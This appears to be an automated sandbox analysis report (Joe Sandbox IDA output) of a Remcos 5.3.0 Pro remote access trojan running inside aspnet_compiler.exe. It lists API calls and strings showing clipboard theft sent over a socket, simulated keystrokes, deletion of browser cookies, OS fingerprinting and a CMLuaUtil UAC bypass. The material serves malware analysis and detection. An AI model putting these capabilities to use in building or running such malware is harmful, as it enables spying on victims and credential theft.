                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                          • __freea.LIBCMT ref: 00449B37
                                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                          • __freea.LIBCMT ref: 00449B40
                                                                          • __freea.LIBCMT ref: 00449B65
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 3864826663-0
                                                                          • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                          • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                          • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                          • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                          APIs
                                                                          • SendInput.USER32 ref: 00418B08
                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                            • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InputSend$Virtual
                                                                          • String ID:
                                                                          • API String ID: 1167301434-0
                                                                          • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                          • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                          • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                          • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                          APIs
                                                                          • OpenClipboard.USER32 ref: 00415A46
                                                                          • EmptyClipboard.USER32 ref: 00415A54
                                                                          • CloseClipboard.USER32 ref: 00415A5A
                                                                          • OpenClipboard.USER32 ref: 00415A61
                                                                          • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                          • CloseClipboard.USER32 ref: 00415A89
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                          • String ID:
                                                                          • API String ID: 2172192267-0
                                                                          • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                          • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                          • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                          • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free
                                                                          • String ID:
                                                                          • API String ID: 269201875-0
                                                                          • Opcode ID: 714fb272f4c7917b76c675d30aae230e33aac3baeb4f8630fb8b603ed7da88bc
                                                                          • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                          • Opcode Fuzzy Hash: 714fb272f4c7917b76c675d30aae230e33aac3baeb4f8630fb8b603ed7da88bc
                                                                          • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                          APIs
                                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                          • _free.LIBCMT ref: 00444086
                                                                          • _free.LIBCMT ref: 0044409D
                                                                          • _free.LIBCMT ref: 004440BC
                                                                          • _free.LIBCMT ref: 004440D7
                                                                          • _free.LIBCMT ref: 004440EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$AllocateHeap
                                                                          • String ID: J7D
                                                                          • API String ID: 3033488037-1677391033
                                                                          • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                          • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                          • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                          • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                          APIs
                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                          • __fassign.LIBCMT ref: 0044A180
                                                                          • __fassign.LIBCMT ref: 0044A19B
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                          • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                          • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1324828854-0
                                                                          • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                          • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                          • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                          • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                          APIs
                                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                            • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                            • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                                          • String ID: TUFTUF$>G$DG$DG
                                                                          • API String ID: 3114080316-344394840
                                                                          • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                                          • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                          • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                                          • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                          APIs
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                          • String ID: csm
                                                                          • API String ID: 1170836740-1018135373
                                                                          • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                          • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                          • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                          • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                          APIs
                                                                            • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                            • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                            • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                          • API String ID: 1133728706-4073444585
                                                                          • Opcode ID: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                                          • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                          • Opcode Fuzzy Hash: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                                          • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                          • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                          • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                          • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                          • int.LIBCPMT ref: 0040FC0F
                                                                            • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                            • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                          • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                          • String ID: P[G
                                                                          • API String ID: 2536120697-571123470
                                                                          • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                          • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                          • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                          • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                          APIs
                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                          Strings
                                                                          • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                          • String ID: http://geoplugin.net/json.gp
                                                                          • API String ID: 3121278467-91888290
                                                                          • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                                          • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                          • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                                          • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                          APIs
                                                                            • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                          • _free.LIBCMT ref: 0044FD29
                                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                          • _free.LIBCMT ref: 0044FD34
                                                                          • _free.LIBCMT ref: 0044FD3F
                                                                          • _free.LIBCMT ref: 0044FD93
                                                                          • _free.LIBCMT ref: 0044FD9E
                                                                          • _free.LIBCMT ref: 0044FDA9
                                                                          • _free.LIBCMT ref: 0044FDB4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                          • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                          • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                          • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                          APIs
                                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                            • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                            • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                            • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                                          • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseCurrentOpenProcessQueryValue
                                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                          • API String ID: 1866151309-2070987746
                                                                          • Opcode ID: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                                          • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                          • Opcode Fuzzy Hash: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                                          • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406835
                                                                            • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                            • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                          • CoUninitialize.OLE32 ref: 0040688E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                          • API String ID: 3851391207-1062857032
                                                                          • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                          • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                          • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                          • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                          • int.LIBCPMT ref: 0040FEF2
                                                                            • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                            • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                          • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                          • String ID: H]G
                                                                          • API String ID: 2536120697-1717957184
                                                                          • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                          • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                          • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                          • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                          APIs
                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                          • GetLastError.KERNEL32 ref: 0040B2EE
                                                                          Strings
                                                                          • UserProfile, xrefs: 0040B2B4
                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                          • [Chrome Cookies not found], xrefs: 0040B308
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteErrorFileLast
                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                          • API String ID: 2018770650-304995407
                                                                          • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                          • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                          • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                          • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                          APIs
                                                                          • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Console$AllocOutputShowWindow
                                                                          • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                          • API String ID: 2425139147-2527699604
                                                                          • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                          • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                          • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                          • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                          Strings
                                                                          • BG, xrefs: 00406909
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, xrefs: 00406927
                                                                          • (CG, xrefs: 0040693F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$BG
                                                                          • API String ID: 0-4127071392
                                                                          • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                          • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                          • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                          • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                          APIs
                                                                          • __allrem.LIBCMT ref: 00439789
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                          • __allrem.LIBCMT ref: 004397BC
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                          • __allrem.LIBCMT ref: 004397F1
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 1992179935-0
                                                                          • Opcode ID: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                          • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                          • Opcode Fuzzy Hash: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                          • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __cftoe
                                                                          • String ID:
                                                                          • API String ID: 4189289331-0
                                                                          • Opcode ID: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                                          • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                          • Opcode Fuzzy Hash: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
